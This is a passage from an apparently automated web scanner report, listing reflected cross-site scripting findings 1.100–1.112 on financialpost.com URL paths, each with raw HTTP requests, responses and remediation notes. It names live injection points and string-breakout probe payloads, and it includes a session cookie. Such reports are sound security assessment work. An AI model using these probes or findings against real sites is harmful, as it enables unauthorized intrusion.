p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43275


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executived2a5c';dbe23d485fd/hr/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executived2a5c';dbe23d485fd;kw=hr;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83164053?">
...[SNIP]...

1.100. http://www.financialpost.com/executive/hr/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/hr/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c50a'%3b34e2fdea153 was submitted in the REST URL parameter 2. This input was echoed as 1c50a';34e2fdea153 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/hr1c50a'%3b34e2fdea153/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43240


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/hr1c50a';34e2fdea153/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=hr1c50a';34e2fdea153;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68906842?">
...[SNIP]...

1.101. http://www.financialpost.com/executive/smart-shift/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/smart-shift/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d117'%3b6a5beb61248 was submitted in the REST URL parameter 1. This input was echoed as 8d117';6a5beb61248 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive8d117'%3b6a5beb61248/smart-shift/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37612


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive8d117';6a5beb61248/smart-shift/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive8d117';6a5beb61248;kw=smart-shift;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70165164?">
...[SNIP]...

1.102. http://www.financialpost.com/executive/smart-shift/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/smart-shift/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1806'%3b95ff51b1cd7 was submitted in the REST URL parameter 2. This input was echoed as c1806';95ff51b1cd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/smart-shiftc1806'%3b95ff51b1cd7/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43420


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/smart-shiftc1806';95ff51b1cd7/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=smart-shiftc1806';95ff51b1cd7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34941163?">
...[SNIP]...

1.103. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/social+media+worth+investment/3972248/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46365'%3b0515ef5e13 was submitted in the REST URL parameter 1. This input was echoed as 46365';0515ef5e13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive46365'%3b0515ef5e13/social+media+worth+investment/3972248/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79029
Expires: Sun, 19 Dec 2010 03:12:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive46365';0515ef5e13/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive46365';0515ef5e13;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=76882130?">
...[SNIP]...

1.104. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/social+media+worth+investment/3972248/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf67'%3bc8bd6c0d374 was submitted in the REST URL parameter 3. This input was echoed as dbf67';c8bd6c0d374 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/social+media+worth+investment/3972248dbf67'%3bc8bd6c0d374/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70627
Expires: Sun, 19 Dec 2010 03:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/social-media-worth-investment/3972248dbf67';c8bd6c0d374/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=social-media-worth-investment;kw=3972248dbf67';c8bd6c0d374;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=
...[SNIP]...

1.105. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/social+media+worth+investment/3972248/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 765b9'%3ba07db4f3a59 was submitted in the REST URL parameter 4. This input was echoed as 765b9';a07db4f3a59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/social+media+worth+investment/3972248/765b9'%3ba07db4f3a59 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44205


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/social%20media%20worth%20investment/3972248/765b9';a07db4f3a59/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=social%20media%20worth%20investment;kw=3972248;kw=765b9';a07db4f3a59;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroun
...[SNIP]...

1.106. http://www.financialpost.com/executive/women/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b4ce'%3b81b991a8c20 was submitted in the REST URL parameter 1. This input was echoed as 2b4ce';81b991a8c20 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive2b4ce'%3b81b991a8c20/women/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43335


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive2b4ce';81b991a8c20/women/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive2b4ce';81b991a8c20;kw=women;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68754463?">
...[SNIP]...

1.107. http://www.financialpost.com/executive/women/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa96'%3bb6cfa407c54 was submitted in the REST URL parameter 2. This input was echoed as 4aa96';b6cfa407c54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/women4aa96'%3bb6cfa407c54/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44120


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/women4aa96';b6cfa407c54/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=women4aa96';b6cfa407c54;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=84484550?">
...[SNIP]...

1.108. http://www.financialpost.com/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18de6'%3b4749081e3e1 was submitted in the REST URL parameter 1. This input was echoed as 18de6';4749081e3e1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images18de6'%3b4749081e3e1/favicon.ico HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55; s_cc=true; s_depth=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:12 GMT
Date: Sun, 19 Dec 2010 03:03:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43028


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/images18de6';4749081e3e1/favicon;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=images18de6';4749081e3e1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=91586613?">
...[SNIP]...

1.109. http://www.financialpost.com/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a887a'%3b741dad57e16 was submitted in the REST URL parameter 2. This input was echoed as a887a';741dad57e16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/a887a'%3b741dad57e16 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55; s_cc=true; s_depth=1; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:20 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43044


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/images/a887a';741dad57e16/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=images;kw=a887a';741dad57e16;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=58957365?">
...[SNIP]...

1.110. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/header/ccn-login.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42deb'%3bac05bd1a0a1 was submitted in the REST URL parameter 1. This input was echoed as 42deb';ac05bd1a0a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes42deb'%3bac05bd1a0a1/header/ccn-login.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43285


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes42deb';ac05bd1a0a1/header/ccn-login;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes42deb';ac05bd1a0a1;kw=header;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=97543753?">
...[SNIP]...

1.111. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/header/ccn-login.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f71'%3bf62fcd6e2bf was submitted in the REST URL parameter 2. This input was echoed as 71f71';f62fcd6e2bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/header71f71'%3bf62fcd6e2bf/ccn-login.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 39220


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes/header71f71';f62fcd6e2bf/ccn-login;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes;kw=header71f71';f62fcd6e2bf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=47352505?">
...[SNIP]...

1.112. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/header/ccn-login.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 172af'%3b120f40364cb was submitted in the REST URL parameter 3. This input was echoed as 172af';120f40364cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/header/172af'%3b120f40364cb HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
